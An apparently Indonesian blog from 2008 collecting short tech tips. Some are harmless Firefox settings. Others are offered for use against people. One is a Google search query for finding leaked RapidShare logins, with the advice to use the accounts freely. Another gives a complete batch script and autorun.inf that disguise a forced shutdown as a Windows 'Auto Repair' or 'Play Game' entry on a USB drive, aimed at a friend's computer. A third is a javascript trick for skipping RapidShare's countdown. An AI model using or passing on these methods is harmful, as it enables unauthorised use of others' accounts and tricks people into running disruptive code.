Sunday, December 21, 2008

Mencari Account RapidShare Melalui Om Google

Yuk langsung aja kita ke tutorialnya

langkah-langkah:
1. Buka om google

2. Lalu ketikkan Expiration-date:*2009 +login: rapidshare.com, Search.

3. Maka hasilnya akan tampil seprti gambar dibawah ini


4. Click salah satu dari link tersebut, maka beberapa account rapidshare akan terlihat



5. Gunakan deh sepuasnya dengan account tersebut.
by:p-no

Read More..

Friday, December 19, 2008

Ikutan Lempar Bush

hi,,,
Saya ada link yang mantap nih....
situs yang menyediakan game untuk melempar Bush pakai sepatu
klik aja link dibawah ini

Read More..

Monday, December 8, 2008

Mejahili Teman

Pernahkan teman anda meminjam flashdisk anda? Tentu saja pernah bukan. Tetapi pernahkah terpikirkan oleh anda bagaimana cara menjahili teman anda dengan flashdisk milik kita. Tips kali ini kita akan menjahili teman dengan flashdisk milik kita, ketika ia mencolokkan flashdisk pada computer maka computer akan langsung shutdown.

Ikuti langkah berikut:
1. Copy file shutdown.exe yang berada pada C:\WINDOWS\system32 ke flashdisk.

2. Buka Notepad lalu CopyPaste Skript yang berwarna merah dibawah ini
@echo off
title Microsoft Windows TM Auto Repair
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
pause
echo.
Shutdown.exe -s -c "Finish Repair System" -f -t 10
echo.
Exit
Lalu [CTRL]+[S],simpan pada flashdisk, pada filename ketikkan auto.cmd, pada file type as pilih All Files, tekan tombol Save.

3. Langkah berikutnya cari icon yang menarik perhatian, lalu copy paste pada flashdisk. Setelah itu rename icon tsb menjadi need.

4. Buka notepad lagi, lalu ketikkan script yang berwarna merah dibawah ini
[autorun]
action="Play Game"
open=auto.cmd
icon=need.ico
lalu [CTRL]+[S], simpan pada flashdisk, pada filename ketikkan autorun.inf, pada file type as pilih All Files, tekan tombol Save.


Sekarang eject flashdisk tersebut lalu colokkan kembali, maka hasilnya akan tampak seperti ini


Ketika teman anda menekan tombol OK atau double click pada Play Game maka computer secara otomatis akan melakukan shutdown dengan sendirinya. Hehehe…….
By:p-no

Read More..

Monday, November 24, 2008

Membuat Firefox 2x Lebih Cepat

Pertama-tama saya ucapkan terima kasih kepada clickhit. Karena telah memberikan tips yang berharga ini. OK kita langsung aja.

Ikuti cara dibawah ini :
1. buka browser firefox nya... di address bar nya ketik about:config
Photobucket

2. di filter search bar ketik network.http.pipelining (agar ga salah ketik mending co-pas aja) pastikan value field drubah menjadi true,double-click agar true.
Photobucket

3. kembali lagi ke filter search bar dan ketik network.http.pipelining.maxrequests. Double-click trus rubah dari awalnya 4 menjadi 8.

4. balik lagi ke filter search bar dan ketik network.http.proxy.pipelining rubah dari status false menjadi tru dengan cara klik ganda

5. ketik network.dns.disableIPv6 di filter search bar dan set menjadi true dari nilai awal false

6. klik kanan (kalo di mac os ctrl-click) di dalam body browser, trus klik kanan pilih New kemudian Boolean dari the pop-up menu. kemudian:
Photobucket
A. masukan content.interrupt.parsing pada New boolean value pop-up window dan click OK
B. pilih true saat menanyakan nilainya

Read More..

Friday, November 7, 2008

Ngakalin Countdown Rapidshare

Kali ini kita akan ngakalin Countdown rapidshare...

Langkah-langkah:
1. Klik free user.
2. Hapus address bar lalu ketik (tanpa tanda petik)
"javascript:fc(0);"
3. Tekan enter.

Read More..

Monday, November 3, 2008

Tips, Trick, Tutorial Blog: 20 Cara Meningkatkan Traffic Blog

Tips, Trick, Tutorial Blog: 20 Cara Meningkatkan Traffic Blog

Read More..

Saturday, October 25, 2008

Firefox Tip: Paste multiple lines to input boxes

If you've ever tried copying and pasting a multi-line address into Google Maps just to realize that an input box will only take one line at a time—meaning that you have to copy and paste each line individually—there's a simple Firefox tweak that will solve this problem:

1) Type "about:config" in the location bar.

2) In the "Filter" field type "singleline."

3) Set editor.singleLine.pasteNewlines to 2, which will allow pasting of multiple lines to input boxes.

Read More..
Template by : kendhin x-template.blogspot.com